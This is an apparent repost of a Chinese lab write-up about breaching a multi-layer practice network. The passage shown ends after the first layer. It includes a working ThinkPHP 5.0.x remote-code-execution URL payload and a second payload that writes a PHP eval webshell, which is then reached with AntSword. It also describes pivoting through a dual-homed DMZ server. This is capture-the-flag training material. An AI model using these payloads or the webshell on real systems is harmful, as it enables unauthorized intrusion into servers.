打穿你的内网之三层内网渗透

2022-9-18 14:08| 发布者: gk-auto| 查看: 890| 评论: 0|来自: 博客园

摘要: 引言在过去的一些实战经历中发现自己内网相关的技能还比较薄弱，所以专门找了个靶场（teamssix.com）做下练习，靶场的web漏洞利用都很简单，主要训练自己内网搭代理隧道的熟练度，如果你和我一样对复杂网络下隧道 ...

引言

在过去的一些实战经历中发现自己内网相关的技能还比较薄弱，所以专门找了个靶场（teamssix.com）做下练习，靶场的web漏洞利用都很简单，主要训练自己内网搭代理隧道的熟练度，如果你和我一样对复杂网络下隧道搭建不熟悉的话，不妨一起看看这篇文章，希望能对你有一些帮助。

目标：拿下内网最深处主机的flag.txt 文件

外网打点

在互联网环境下发现一处资产，这里以 x.x.220.130 替代，直接访问 x.x.220.130 发现以下页面：

很明显这是一个thinkphp应用，随便指定一个路由http://x.x.220.130/index.php/?s=123，爆出thinkphp的详细版本。

tp5在5.0-5.0.24 和 5.1.0-5.1.30都是存在RCE（Remote code Execution）的，这里运气很好，直接使用5.0.x路由默认兼容模式进行RCE，使用以下payload 执行id命令：

http://x.x.220.130/index.php/?s=index|think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][0]=id

可以看见命令执行成功。

接下来直接写入一个shell ，使用php 的 file_put_contents 函数写个一句话木马：

http://x.x.220.130/index.php/?s=index|think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=qaxnb.php&vars[1][1]=%3C?php%20@eval($_POST[%27qaxnb666%27]);?%3E

验证：

验证成功，直接使用蚁剑进行连接。

将超时时间调高，因为后续会上传文件避免超时而中断：

连接成功：

第一层的flag就在网站根目录下面, 直接双击读取即可：

突破边界（第一层）

接上文，已经拿下第一台服务器，尝试对这台服务器进行信息收集：

拿下的这台服务器发现权限并不高仅为www，但是有惊喜的是这台机器存在双网卡，其中一张网卡（ens37）绑定了内网ip（192.168.22.131），证明这台服务器处于企业架构的DMZ（非军事区）区域，且是两个网段的边界节点，那么我们只要借助这台服务器作为跳板即可进入这家企业的内网，至少进入了192.168.22.x/24网段的内网。